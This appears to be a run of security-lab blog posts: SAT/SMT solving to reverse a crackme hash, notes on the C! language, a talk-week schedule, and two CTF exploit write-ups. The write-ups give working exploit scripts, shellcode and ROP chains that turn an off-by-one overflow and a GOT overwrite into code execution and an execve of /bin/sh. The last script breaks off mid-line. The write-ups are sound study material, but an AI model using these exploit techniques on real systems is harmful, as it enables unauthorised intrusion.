$$x - y \equiv x + COMPL2(y) \equiv x + INVERT(y) + 1$$def cnf_invert(gen, n): inv = [gen.new_var() for b in n] for (b, i) in zip(n, inv): gen.add(b, i) gen.add(-b, -i) return inv def cnf_sub(gen, a, b): invb = cnf_invert(gen, b) complb = cnf_add(gen, invb, cnf_const32(gen, 1)) return cnf_add(gen, a, complb)
Addition on 32 bit integers is however a lot harder to define. If you did a bit of electrical engineering or if you have implemented an ALU (in HDL, with wires and logic gates, or even in Minecraft) you may know a very common way to define addition using two half adders to make a 1 bit full adder. Here is what a full adder looks like (image courtesy of Wikipedia):
It takes two bits, A and B, as well as a carry from a previous adder (
Cin
), and outputs the sumA + B + Cin
and the carry resulting from that sumCout
. You can then chain these 1 bit full adders to make a 32 bit adder (again, image from Wikipedia):Writing the truth table of a 1 bit full adder and simplifying the equations a bit, you get the following equations for
S
andCout
fromA
,B
andCin
:$$\begin{aligned} S & \equiv \overline{A} B \overline{C_{in}} \vee A \overline{B C_{in}} \vee A \overline{B} C_{in} \vee A B C_{in} \\\\ C_{out} & \equiv A B \vee A C_{in} \vee B C_{in} \end{aligned}$$You can then translate these formulas to CNF to describe a 1 bit full adder for the SAT solver. However doing that manually is a lot of work (especially if you’re like me and never had proper formation on CNF and how to convert formulas to that form), so we’re just going to use the boolean algebra package from Sage to do it automatically:
sage: import sage.logic.propcalc as propcalc sage: f = propcalc.formula("d <-> (~a&b&~c | a&~b&~c | ~a&~b&c | a&b&c)") sage: f.convert_cnf_table() sage: f (d|a|b|~c)&(d|a|~b|c)&(d|~a|b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|~b|~c)&(~d|~a|b|~c)&(~d|~a|~b|c) sage: f = propcalc.formula("d <-> (a&b | a&c | b&c)") sage: f.convert_cnf_table() sage: f (d|a|~b|~c)&(d|~a|b|~c)&(d|~a|~b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|b|~c)&(~d|a|~b|c)&(~d|~a|b|c) sage: import sage.logic.propcalc as propcalc sage: f = propcalc.formula("d <-> (~a&b&~c | a&~b&~c | ~a&~b&c | a&b&c)") sage: f.convert_cnf_table() sage: f (d|a|b|~c)&(d|a|~b|c)&(d|~a|b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|~b|~c)&(~d|~a|b|~c)&(~d|~a|~b|c) sage: f = propcalc.formula("d <-> (a&b | a&c | b&c)") sage: f.convert_cnf_table() sage: f (d|a|~b|~c)&(d|~a|b|~c)&(d|~a|~b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|b|~c)&(~d|a|~b|c)&(~d|~a|b|c)
We can then convert the CNF clauses Sage gives us directly to Python:
def cnf_1bitadder(gen, a, b, c): res = gen.new_var() res_carry = gen.new_var() # (d|a|~b|~c)&(d|~a|b|~c)&(d|~a|~b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|b|~c)&(~d|a|~b|c)&(~d|~a|b|c) gen.add(res_carry, a, -b, -c) gen.add(res_carry, -a, b, -c) gen.add(res_carry, -a, -b, c) gen.add(res_carry, -a, -b, -c) gen.add(-res_carry, a, b, c) gen.add(-res_carry, a, b, -c) gen.add(-res_carry, a, -b, c) gen.add(-res_carry, -a, b, c) # (d|a|b|~c)&(d|a|~b|c)&(d|~a|b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|~b|~c)&(~d|~a|b|~c)&(~d|~a|~b|c) gen.add(res, a, b, -c) gen.add(res, a, -b, c) gen.add(res, -a, b, c) gen.add(res, -a, -b, -c) gen.add(-res, a, b, c) gen.add(-res, a, -b, -c) gen.add(-res, -a, b, -c) gen.add(-res, -a, -b, c) return res, res_carry
Probably not the nicest way to do it, but most likely one of the simplest way. We can then use that one bit adder to make a 32 bit adder:
def cnf_add(gen, a, b): carry = gen.new_var() gen.add(-carry) # The first carry is always 0 out = [] for (a, b) in zip(a, b): res, carry = cnf_1bitadder(gen, a, b, carry) out.append(res) return out
With this we can finally implement our checksum!
sum = cnf_add(gen, a, cnf_add(gen, b, cnf_add(gen, c, d))) sub = cnf_sub(gen, cnf_xor(gen, a, b), cnf_xor(gen, c, d)) cksum = cnf_xor(gen, cnf_rotl(gen, sub, 17), sum) cnf_equal(gen, cksum, 0xa6779036)
Running our Python program generates a DIMACS file with 17061 variables and 19365 clauses. CryptoMiniSat can find a set of values that satisfy the clauses in less than 0.05s on my Sandy Bridge based laptop. For example,
a = 0xe9e708e1, b = 0xf7e4c55a, c = 0x85e77db9 and d = 0x5467bd3c
pass both the checksum and the hash and are considered a valid solution.Using Z3 to make things easier
At first I planned to stop there: I had a proof that the crackme was still doable even with that broken hash algorithm. However when I explained what I was doing, a friend of mine told me about SMT solvers. One of their characteristics is that they can work on boolean algebra, but also functions and linear combinations of integer and real variables. For example, you can use an SMT solver for this kind of problem:
$$x^2 + y^2 < 1, 2x + y > 1$$I looked a bit at recent SMT solvers to see if it could make cracking my hash easier. I used the Z3 theorem prover from Microsoft Research, which is not open source but has Linux binaries and nice interfaces for programming languages like Python and OCaml. Z3 can work on real numbers, integers, functions but also bit vectors, and has a nice API to do so.
As expected, things are a lot easier when your solver has native support for your native problem representation (here, bit vectors and unsigned integers). The code cracking the hash using Z3 is a fair bit slower (still less than 5s) but also much shorter and easier to understand:
def rotl32(n, sa): return (n << sa) | LShR(n, 32 - sa) def hash(a, b, c, d): out = [] for i, n in enumerate((a, b, c, d)): nn = BitVecVal(0, 32) for j in range(32): nn |= (LShR(n, SCRAMBLE_TABLE[i][j]) & 1) << j nn ^= XOR_TABLE[i] out.append(nn) out[0] = rotl32(out[0], ROT_TABLE[0]) out[1] = rotl32(out[1], ROT_TABLE[1]) out[2] = rotl32(out[2], ROT_TABLE[2]) out[3] = rotl32(out[2], ROT_TABLE[3]) return out if __name__ == '__main__': s = Solver() a = BitVec('a', 32) b = BitVec('b', 32) c = BitVec('c', 32) d = BitVec('d', 32) checksum = rotl32((a ^ b) - (c ^ d), 17) ^ (a + b + c + d) a ^= c b ^= d for i in range(128): a, b, c, d = hash(a, b, c, d) solve(checksum == 0xa6779036, a == 0x8e2c4c74, b == 0xa6c27e2a, c == 0xf5e15d3d, d == 0x7bebc2ba)
Here the shorter code is mostly due to the fact I did not have any nice API to use CryptoMiniSat and to translate arithmetic operations to CNF. SMT solvers do not provide that much of an edge over SAT solvers for these kind of problems: they shine a lot more as soon as you introduce functions or real numbers that can’t easily be expressed as a bit vector.
Conclusion
Sometimes when simple bruteforce does not work you have to go a bit further to reverse a hash algorithm, and using a SAT solver enables you to do just that. The problem is not always easy to formalize, especially when you start using complex operations that can’t easily be translated, but using SAT solvers for cryptography is a very interesting technique that has already proven itself a lot of times in the past, and will probably become more and more useful in the future as SAT solvers and ways to formalize hard problems (like AES) evolve.
C! - system oriented programming - syntax explanation
Following the previous article introducing C! I now present the language itself. I kept presentation as short as possible and present relation to C syntax when it’s relevant.
Basic syntax: statement and expressions
Globally C! code will look like C code. There’re few details due to some adjustement but you’ll find usual operators, functions call, loop and if statements … The global structure of the code will look very familiar.
Among minor differencies are: cast, function pointer usage and types syntax.
Declarations
The most striking differencies is probably declarations syntax. In C, there’s no clear separtation between the declared entity (variables, functions or type names) and the type description of the entity. For example, in C, if you declare an array of characters you’ll write something like:
char t[256];
The variable name is t and its type is array of char (the size being some extra information.)
In C!, we choose to break things more clearly, and have in the declaration a part naming the entity and a part describing its type, the previous expression becomes:
t : char[256];
This clarified the question of the position of the star when declaring a pointer, for example in C, we shall write:
char *p;
and in C!:
p : char*;
The star no longer needs to be attached to p and you can’t write ambiguous declarations like:
char* p, c;
Where c is character and not a pointer to character. Of course, the drawback is that we must write two lines for that example:
p : char*; c : char;
The same logic appears on function declaration, for example the following C code:
char f(char c) { if (c < 'a' || c > 'z') return c; return 'A' + c - 'a'; }
Will be written in C!:
f(c : char) : char { if (c < 'a' || c > 'z') return c; return 'A' + c - 'a'; }
We apply the same idea to cast, thus the following code:
void f(void *p, char *c) { *c = *((char*)p); }
becomes:
f(p : void*, c : char*) : void { *c = *(p : char*); }
The same logic is shown in type name definitions:
typedef char *string;
becomes:
typedef string = char*;
Again, function pointer have a simplified syntax: the name of the variable is no longer inside the type. So the following C code:
char (*f)(char,char*);
Becomes:
f : <(char,char*)> : char;
Of course, you can add initilization expressions:
a : char = 'a';
Integer and floating point numbers
We decide to have explicit size and signedness in integer types. Thus, integer will be declared as follow:
x : int<32>; // a signed 32bits integer y : int<+16>; // an unsigned 16bits integer z : int<24>; // uncommon size declaration
Sizes not belongings to standard sizes are stored using available integer types in C99 (the ones defined in stdint.h) and are masked when needed to prevent usage of unwanted values.
The same ideas apply to floating point numbers:
f : float<64>; // a double float
Of course, you can define some types name (but you can’t use int, char and float):
typedef short = int<16>;
Sized integer in structure definition are directly translated as bitfields, so we have a single syntax.
We extends the language syntax with a notion of bits arrays: that is an integer can be used as an array of bits:
x : int<+32> = 41; x[31] = 1; // set the most significant bit to 1 x[31] = 0; // set the most significant bit to 0 x += (x[0] ? 1 : 0); // make x even if not
When setting bit, value other than 0 are transformed into 1.
Object Oriented Extension
We introduce a classical, but yet simple, OOP extension to our language. So first, you can define classes with attributes, methods and constructors:
class A { x : int<32>; get() : int<32> { return x; } set(y : int<32>) : void { x = y; } // A simple constructor init(y : int<32>) { x = y; } }
We have simple inheritance and methods are true methods (that is virtual methods):
class B : A { y : float<32>; init(a : int<32>, b : float<32>) { A(this, a) // call A constuctor y = b; } get() : int<32> { return x + (y : int<32>); } }
We don’t have (yet ?) method overloading, only overriding.
Object in C! are always pointer and you should allocate them by yourself (so we don’t rely on predefined allocator) but you can create some kind of « local object » that is an object defined on the stack or as global value.
og : A = A(some_pointer, 41); // object creation require pre-allocation ol : local A(42); // object on the stack og.set(og.get() + 1);
There’s no implicit destructor calls for now, but depending on real nead we may add it for local objects.
Since we only have pointed-object there’s no implicit copy as in C++ nor there’s need for references. Access to content (all is public) is done with the simple dot syntax.
The constructor for an object is a simple function that take a pointer to the concrete object (the object pointer) and any needed parameters. It returns the object pointer. If you’re object is “compatible” with the object built by a given constructor, you safely can pass it to the constructor (as in the previous example.)
Local object are not automatically initialized, in the following code
o : local A;
Object o is allocated on the local scope but not initiliazed: methods table is “empty” (a method call will fail … ) In near future we probably be able to detect that, or at least provide a minimal initialization.
We also provide interface and abstract methods.
I may explain generated code in some future article.
Typed macro and Macro Class
We introduce a simple way to define typed macro constants and macro functions: you just a # at the begining of a declaration:
#X : int<32> = 42; #square(x : int<32>) : int<32> { return x * x; }
Our macro functions enjoy a real call by value semantics (using some tricks in the generated code) and (once typed by C!) are real cpp macro in the generated code!
The other macro extension is the macro class concept: we syntactically embeded a value (of any type) in some kind of object with methods. The result produces special macro but let you use your values just like an object.
macro class A : int<32> // storage kind { get() const : int<32> // won't modify inner storage { return this; // this represent the inner storage value } set(x : int<32>) : void // non const can modify inner storage { this = x; } }
For now, all “macro code” generate CPP macro (with a lot of tricks to respect call by value and return management. It is not excluded to generate inlined functions in the future as long as we are sure that semantics is preserved.
One of the idea behind macro class is to provide a simple syntax (OO like) for constructions that do not require functions (or worse the burden of a whole object.)
Properties
Properties is an other extension (very young and poorly tested) in the same spirit than macro class.
The idea is quite simple: it provides a way to overload access to any kind of value (structured or not) and make it appears as another type (the virtual type.) You just have to provide a getter and a setter and when context requires the virtual type the compiler automatically insert the right accesser.
For example, you have a 32 bits unsigned integer stored in two different locations but you want to access it as if it is a plain and simple integer. Suppose you have a structure s storing the two pointer, you’ll have use it that way in plain old C:
unsigned x, y = 70703; x = ((*(s.high)) << 16) + *(s.low); // getting the value *(s.high) = y >> 16; // setting the value *(s.low) = y & (0xffff);
You can declare a property that way (I included the structure describing our splitted integer):
struct segint { high: int<+16>*; low: int<+16>*; } property V(segint) : int<+32> { get() { return ((*(this.high)) << 16) + *(this.low); } set(y : int<+32>) { *(this.high) = y >> 16; *(this.low) = y & (0xffff); } }
And then, to use it:
s : segint; s.high = &high; s.low = &low; // init the struct x : V = s; // warning: x is a copy of s y : int<+32>; y = x + 1; // accessing the value x = 70703 // setting it
Since a property can have any real type you want, it can be part of an object and have its own this pointer corresponding to a pointer to the object (since every thing is public the property have a fool access to the object.)
As of now, accessors are generated as macro and access to the real value is done through a reference (so it can be modified.)
Support for op-assign (operators like +=) and other similar operators (mainly ++) will probably be added later.
LSE Week 2012 announcement
Last year we introduced the idea of doing a yearly week of talks to show the work we are doing here at the LSE, and also to introduce concepts we have been working on, or concepts we have encountered. As it was quite a success, we decided to go on with the idea.
This year, we have reserved 5 days, from Monday, 16th of July to Friday, 20th July. We have 15 talks scheduled which amounts for 14 hours.
One thing though is that these talks are going to be in french, however slides will be in english. Recordings should be available soon after the event.
More informations (in french, including a full abstract of each talk) are available on this page.
We are also putting a small crackme online (available here) for people who want some challenge.
Monday, 16th July
CSAT (Pierre-Marie de Rodat - 18h00 - 30mn)
The premise of an interactive disassembler aiming at being collaborative.
ARM architecture (Julien Frêche - 18h30 - 30mn)
Global overview and emulator writing.
Datameat (Victor Apercé - 19h00 - 1h)
Metadata oriented filesystem.
FrASM (Pierre-Marie de Rodat - 20h00 - 30mn)
An assembler writing framework.
Tuesday, 17th July
Video game console emulation (Pierre Bourdon & Nicolas Hureau - 18h00 - 1h30)
Implications and problems of emulating high performance hardware and cycle-accurate emulation.
Possible optimizations for an interpreter (Benoît Zanotti - 19h30 - 30mn)
What can be done? How will it impact performance? Prolog as an example.
Wednesday, 18th July
Routing protocol: BGP4 (Sylvain Laurent - 18h00 - 1h)
Introduction to BGP4 and its role in networks.
WTF is ACPI? (Ivan Delalande - 19h00 - 1h)
Global overview and implementation of an ACPI VM.
Forensics (Samuel Chevet - 20h00 - 1h)
Interest and tools.
Thursday, 19th July
Tutorial: Arduino development (Augustin Chéron - 18h00 - 1h)
Use cases, limitations and demonstration of the Arduino platform.
Tutorial: Exploitation techniques (Clément Rouault - 19h00 - 1h)
Examples and mitigation of software exploits.
Introduction to CTFs (Nicolas Hureau - 20h00 - 30mn)
Interest of participating in security contests and walkthrough of a few exercises.
Friday, 20th July
WPA2 enterprise and Wi-Fi security (Pierre Bourdon - 18h00 - 1h)
What is to be avoided when deploying Wi-Fi on a student campus.
Evolution of rootkits (Samuel Chevet - 19h00 - 1h)
Inner working, analysis and development of the major rootkits.
Crackme LSE Week (Pierre Bourdon - 20h00 - 30mn)
Making-of and solution of the LSE Week crackme.
SecuInside2K12 Prequals: kielbasa writeup
Kielbasa is a linux elf32 cgi binary which generates and validates ASCII art captchas.
It is accessed via the following address:
http://61.42.25.20/captcha/captcha.cgi?q=sent&v=<captcha>&t_s=<timestamp>
It runs on a CentOS 6.2 with exec-shield and stack randomization. SELinux appears to be disabled and
mmap_min_addr = 0
so we canmmap
the first page. It also turned out that this page was exectuable.Disclaimer: Our exploit seemed to fail on the remote service (Apache returned an error) but near the end of the ctf we found out that using another shellcode did in fact work.
Stage 1 - Craft the stack
The vulnerable function is
sub_8048EB0
, it has the following stack:top of the stack ... -0x168 char* QUERY_STRING -0x164 char t_s[32] -0x144 size_t v_size -0x140 char v[32] -0x120 char* user_agent -0x11C char* ptr_to_t_s -0x118 char* remote_port -0x114 char* somewhere -0x110 char* remote_addr -0x109 uint8 mmap_flags -0x108 int use_malloc ... bottom of the stack
There is an off by one overflow on the size of the
t_s
paramater wich lets us overwrite the first byte ofv_size
(default is8
). Ast_s
can only contain digits, the maximum value we can put inv_size
is0x39
, the ASCII value for9
. Thus we can overwrite the stack up to-0x107
(second byte ofuse_malloc
) with the content ofv
.It then executes (many checks have been removed):
/* ... */ if (use_malloc) { buf = malloc(0x1000u); /* ... */ } else { buf = mmap(0, 0x1000u, mmap_flag, 0, 0); /* ... */ } /* ... */ sprintf(buf, "[%s][%s][%s]\n\n", remote_addr, remote_port, user_agent); /* ... */ if (!*ptr_to_t_s && *somewhere) { jmp(0); return -1; } /* ... */
Our goal is to trigger the
mmap
with the following flags:MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS
and then to use thejmp(0)
in order to execute our mapped page.The page have to contain valid code. We only control the three pointers
remote_addr
,remote_port
anduser_agent
, used by thesprintf
call ([
ispop ebx
and]
ispop ebp
).We needed to find null terminated gadget that would be concatenated.
When we jump to
0x0
the registers have the following values:esi = 0xffffd011 = pointer to v edi = 0
We then searched for a
movsb
gadget and found anmovsb
followed byjmp $ - 4
hidden in alea esp, [ebp-244h]
:$ rasm2 -d 8da57cfdffff lea esp, [ebp+0xfffffd7c] $ rasm2 -d a57cfd movsd jl 0x8048000
As
rasm2
start address is0x08048000
we can see that this produces anmovsb
infinite loop that copies ourv
buffer to0x0
and this until themovsb
loop gets overwritten. Ourstage2
shellcode is located in thev
buffer at offset0x8
. Thejmp $ - 4
is replaced by ajmp 0x8
wich execute our shellcode.We put this gadget in our
user_agent
and junk (but valid) code inremote_addr
andremote_port
in order to reserve some place to put ourstage2
shellcode.Before:
(gdb) x/17i 0 => 0x0: pop ebx ; [ 0x1: nop ; junk 0x2: nop 0x3: nop 0x4: push ebp 0x5: mov ebp,esp 0x7: cmp DWORD PTR ds:0x804afa4,0x5d ; ] is eaten by cmp 0xe: pop ebx ; [ 0xf: nop ; junk 0x10: nop 0x11: nop 0x12: push ebp 0x13: mov ebp,esp 0x15: cmp DWORD PTR ds:0x804afa4,0x5d ; ] is eaten by cmp 0x1c: pop ebx ; [ 0x1d: movs DWORD PTR es:[edi],DWORD PTR ds:[esi] 0x1e: jl 0x1d
After:
(gdb) x/17i 0 0x0: popa ; v[0] = 'a' 0x1: popa ; v[1] = 'a' 0x2: popa ; v[2] = 'a' 0x3: popa ; v[3] = 'a' 0x4: popa ; v[4] = 'a' 0x5: popa ; v[5] = 'a' 0x6: popa ; v[6] = 'a' 0x7: popa ; v[7] = 'a' 0x8: xor ecx,ecx ; stage2 shellcode 0xa: inc ecx 0xb: shl ecx,0x5 0xe: sub di,0x8 0x12: add si,0x19 0x16: rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi] 0x18: nop 0x19: nop 0x1a: nop 0x1b: nop 0x1c: nop 0x1d: nop => 0x1e: jmp 0x8
Here is the stack we crafted:
null = struct.pack("<I", 0x0804897f) nops = struct.pack("<I", 0x080488bd) movs_jmp = struct.pack("<I", 0x0804963d) jmp_arg0 = struct.pack("<I", 0x08049648) MAP_PRIVATE = 0x02 MAP_FIXED = 0x10 MAP_ANONYMOUS = 0x20 mmap_flag = struct.pack("B", MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS) v = captcha # v[0:8] v += stage2 # v[8:28] v += (30 - len(v)) * b'\x90' # nop padding v += yasm("jmp $ - 22") # v[28:32] = b"\xeb\xe8" v += movs_jmp # v[32:36] user_agent v += null # v[36:40] v += nops # v[40:44] remote_port v += jmp_arg0 # v[44:48] v += nops # v[48:52] remote_addr v += b"\x01" * 3 # v[52:55] v += mmap_flag # v[55:56]
Stage 2 - Copy our full shellcode
Our
stage2
is very simple, when we jump back to0x8
we have theQUERY_STRING
pointer inesi
.stage2 = yasm(""" BITS 32 xor ecx, ecx inc ecx shl ecx, 5 ; 0x100 sub di, 8 add si, 25 rep movsb """)
Stage 3 - Free pwn
We put our full length
stage3
shellcode at the end of our query:http://61.42.25.20/captcha/captcha.cgi?q=sent&v=<captcha>&t_s=<timestamp>&<stage3>
For example, a simple
ls
:ls = yasm(""" BITS 32 xor ecx, ecx mul ecx push ecx push 0x736c2f2f ;; sl// push 0x6e69622f ;; nib/ mov ebx, esp push ecx push ebx mov ecx, esp mov al, 11 int 0x80 """)
Full exploit
#!/usr/bin/python3 import os import struct from asm import yasm stage2 = yasm(""" BITS 32 xor ecx, ecx inc ecx shl ecx, 5 ; 0x100 sub di, 8 add si, 25 rep movsb """) ls = yasm(""" BITS 32 xor ecx, ecx mul ecx push ecx push "//ls" ;; sl// push "/bin" ;; nib/ mov ebx, esp push ecx push ebx mov ecx, esp mov al, 11 int 0x80 """) nops = struct.pack("<I", 0x080488BD) movs_jmp = struct.pack("<I", 0x0804963d) null = struct.pack("<I", 0x0804897f) jmp_arg0 = struct.pack("<I", 0x08049648) MAP_PRIVATE = 0x02 MAP_FIXED = 0x10 MAP_ANONYMOUS = 0x20 mmap_flag = struct.pack("B", MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS) t_s = b"9999999999999999999999999999999999999" captcha = b"a" * 8 v = captcha v += stage2 v += (30 - len(v)) * b'\x90' # nop padding v += yasm("jmp $ - 22") v += movs_jmp # USER_AGENT v += null v += nops # REMOTE_PORT v += jmp_arg0 v += nops # REMOTE_ADDR v += b"\x01" * 3 # padding v += mmap_flag env = b'REMOTE_ADDR=192.168.103.61 REMOTE_PORT=80 REQUEST_METHOD="GET" '\ b'HTTP_USER_AGENT="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"' query = b"q=sent&t_s=" + t_s + b"&v=" + v + b"&" + exit42 os.system(env + b' QUERY_STRING="' + query + b'" ./captcha.cgi')
My
asm.py
tool:```python #!/usr/bin/env python3
LSE - Rémi Audebert - 2012
import sys import tempfile import subprocess
def yasm(code): “"”Assemble x86 code with yasm
>>> yasm("int 0x80") b'\\xcd\\x80' """ with tempfile.NamedTemporaryFile() as output_file: p = subprocess.Popen(['/usr/bin/yasm', '-fbin', # raw outout '-o', output_file.name, '-'], stdin=subprocess.PIPE) p.communicate(code.encode()) return output_file.read()
def cstring(data): “”” Convert bytes to c string
>>> cstring(bytearray([0xcd, 0x80])) '\\\\xcd\\\\x80' """ return "".join("\\x" + hex(c)[2:] for c in data)
if name == “main”: import doctest doctest.testmod()
SecuInside2K12 Prequals: dethstarr writeup
Dethstarr was one of my favorite service exploitation challenges during the SecuInside 2012 contest. We had to fully reverse a given binary to understand how the protocol it implements works. To be able to debug the binary easily and in the same environment as on the remote server, we setup xinetd on a CentOS 6.2 Virtual Machine with the following configuration:
service dethstarr { socket_type = stream wait = no flags = REUSE user = w4kfu server = /home/w4kfu/LSE/CTF/SecuInside_2012/dethstarr/dethstarr port = 4242 type = UNLISTED }
To trigger the bug, we have to understand how the protocol works in detail. Looking at the disassembled code, we can figure out 4 different functions that will first read a certain number of bytes, check if it matches several conditions, then read again on the socket with a user specified size (limited to avoid buffer overflows).
First check function
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 0xCA | 0x0 | 0x1 | 0xAC | 0x9A | 0x1 | 0x0 | 0x00010001| 0x54534e49 | 0x1F | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 0xCA | 0x0 | 0x1 | 0xAC | 0x9A | 0x1 | 0x0 | 0x00010001| 0x54534e49 | 0x1F | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
The last 0x1F is the size for the last
read
call of that function (no overflow can occur)Second check function
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 0x8 | 0x1 | 0x1 | 0x0DFE1ABCC | <global_var> | 0x1 | 0xFF| -42 | 0x66| 0x756C| 0xFF| 0x60|0x7FFFFFFF |0x9C |0x1F| +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
The
global_var
is set before each call to the check function.Third check function
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | 0x001A00CB|0x000200DB |0x41420019 |0x6|0x1|0xCA |0xCCCCCCCC | <global_var> | 0x1F| +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Fourth check function
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | <addr>| 0x31323301|<index>|<index>|0x9|0x9|0x1|0xFFFF|0xFFFF0000|0x4|0x00e10052 |<global_var> |0x1F | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Inside this fourth check function lies the vulnerability of this challenge: the index field (
[eax+8]
) is tested to be under0x1F
using a signed compare, which allows negative values:.text:080488EE mov eax, [eax+8] .text:080488F1 cmp eax, 1Fh .text:080488F4 jle short loc_8048909 .text:0804893A mov eax, [eax+8] .text:0804893D mov edx, [ebp+buf] .text:08048940 mov edx, [edx] .text:08048942 mov ds:dword_804A8E0[eax*4], edx
Using this we are able to dereference a negative offset inside a global array and write anything we want in it. I choose to rewrite the
exit()
function address from inside the GOT. Then, when the check function called after this vulnerability fails, it will fail callingexit
and jump to the address we specified. The binary contains a nice function epilogue we can use to overflow one of the program’s buffer:.text:08049518 mov [esp+8], eax ; nbytes .text:0804951C lea eax, [ebp+var_31] .text:0804951F mov [esp+4], eax ; buf .text:08049523 mov dword ptr [esp], 0 ; fd .text:0804952A call _read .text:0804952F mov eax, 0 .text:08049534 .text:08049534 end_function: ; CODE XREF: first_check_buff+65j .text:08049534 ; first_check_buff+8Cj ... .text:08049534 add esp, 44h .text:08049537 pop ebx .text:08049538 pop ebp .text:08049539 retn
The interesting thing is that the exit function is triggered with
eax
being the invalid size we specified (making the check fail). That means we control this register value, which is used as theread
size.After triggering this bug, we can start using ROP to build a shellcode that will bypass ASLR and NX. The shellcode will leak an address from the GOT to allow us to locate
libc.so.6
in memory and build a second stage shellcode using this additional information.First stage ROP chain
0x080495B2 # add esp, 0x1C ; pop ; pop ; pop ; pop ; ret 0x41424344 # Dummy 0x08049515 # Addres inside First check before read
Now we have the size we want in eax, which allow us to create a buffer overflow when
read
is called inside 0x0804928D (a.k.a first check function).Second stage ROP chain
0x080483C4 # Address of the write function in .plt 0x08048DDA # Return Address Second check mov ebp, esp 0x00000001 # File descriptor (stdout) 0x0804A7BC # Address we want to write from: read@.got.plt 0x00000004 # Size of the write
Now that we have the
read
address from the GOT, weret
again on the second check function (it is similar to the first stage ROP chain) and re-trigger the buffer overflow to prepare for stage 3.Third stage ROP chain
<write_addr> + 0xca60 # Computed address of mmap (libc.so.6) 0x080495B2 # add esp, 1C ; pop ; pop ; pop ; pop ; ret // clean mmap args 0x13370000 # Address to map 0x00001000 # Size to map 0x00000007 # RWX 0x00000031 # MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS 0xffffffff # fd 0x00000000 # offset (ignored) ... DUMMY * 20 ... 0x080483F4 # read@.plt 0x13370000 # Return adress: our shellcode 0x00000000 # fd 0x13370000 # Address to read to len(shellcode) # Length of shellcode
This ROP chain will call
mmap
to a fixed address and read our shellcode (execve /bin/sh
) and jump to it.Finally this exploit works well both locally and remotely, and we were able to get the flag in the
/home/dethstarr/key
file. Later on we also used this exploit to get the system time of the server (usingdate
) in order to synchronize ourself with theclassico
service challenge.Here is the final exploit:
import socket import struct import sys s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #s.connect(("61.42.25.25", 8282)) s.connect(("192.168.103.61", 4242)) def first_check(): cmd = struct.pack("<I", 0xCA) cmd += struct.pack("<I", 0x0) cmd += struct.pack("<I", 0x1) cmd += struct.pack("<I", 0xAC) cmd += struct.pack("<I", 0x9A) cmd += struct.pack("<I", 0x1) cmd += struct.pack("<I", 0x00000000) cmd += struct.pack("<I", 0x00010001) cmd += struct.pack("<I", 0x54534e49) cmd += struct.pack("<I", 0x1F) #sys.stdout.write(cmd) s.send(cmd) cmd = "A" * (0x1F) #sys.stdout.write(cmd) s.send(cmd) def second_check(x, size, cmd2, a): cmd = struct.pack("<I", a) cmd += struct.pack("<I", 0x41424344) cmd += struct.pack("<I", 0x41424344) cmd += struct.pack("<I", 0x0DFE1ABCC) # Switch case cmd += struct.pack("<I", x) cmd += struct.pack("<I", 0x41424344) cmd += struct.pack("<I", 0xFF) cmd += struct.pack("<i", -0x42) cmd += struct.pack("<I", 0x66) cmd += struct.pack("<I", 0x756C) cmd += struct.pack("<I", 0xFF) cmd += struct.pack("<I", 0x60) cmd += struct.pack("<I", 0x41424344) cmd += struct.pack("<I", 0x7FFFFFFF) cmd += struct.pack("<I", 0x9C) cmd += struct.pack("<I", size) #sys.stdout.write(cmd) s.send(cmd) #sys.stdout.write(cmd) s.send(cmd2) def third_check(): for i in [1, 0, 2]: cmd = struct.pack("<I", 0x001A00CB) cmd += struct.pack("<I", 0x000200DB) cmd += struct.pack("<I", 0x41420019) cmd += struct.pack("<I", 0x6) cmd += struct.pack("<I", 0x41424344) cmd += struct.pack("<I", 0xCA) cmd += struct.pack("<I", 0xCCCCCCCC) # index cmd += struct.pack("<I", i) cmd += struct.pack("<I", 0x1F) #sys.stdout.write(cmd) s.send(cmd) cmd = "A" * (0x1F) #sys.stdout.write(cmd) s.send(cmd) def fourth_check(x, y, addr): cmd = struct.pack("<I", addr) cmd += struct.pack("<I", 0x31323301) cmd += 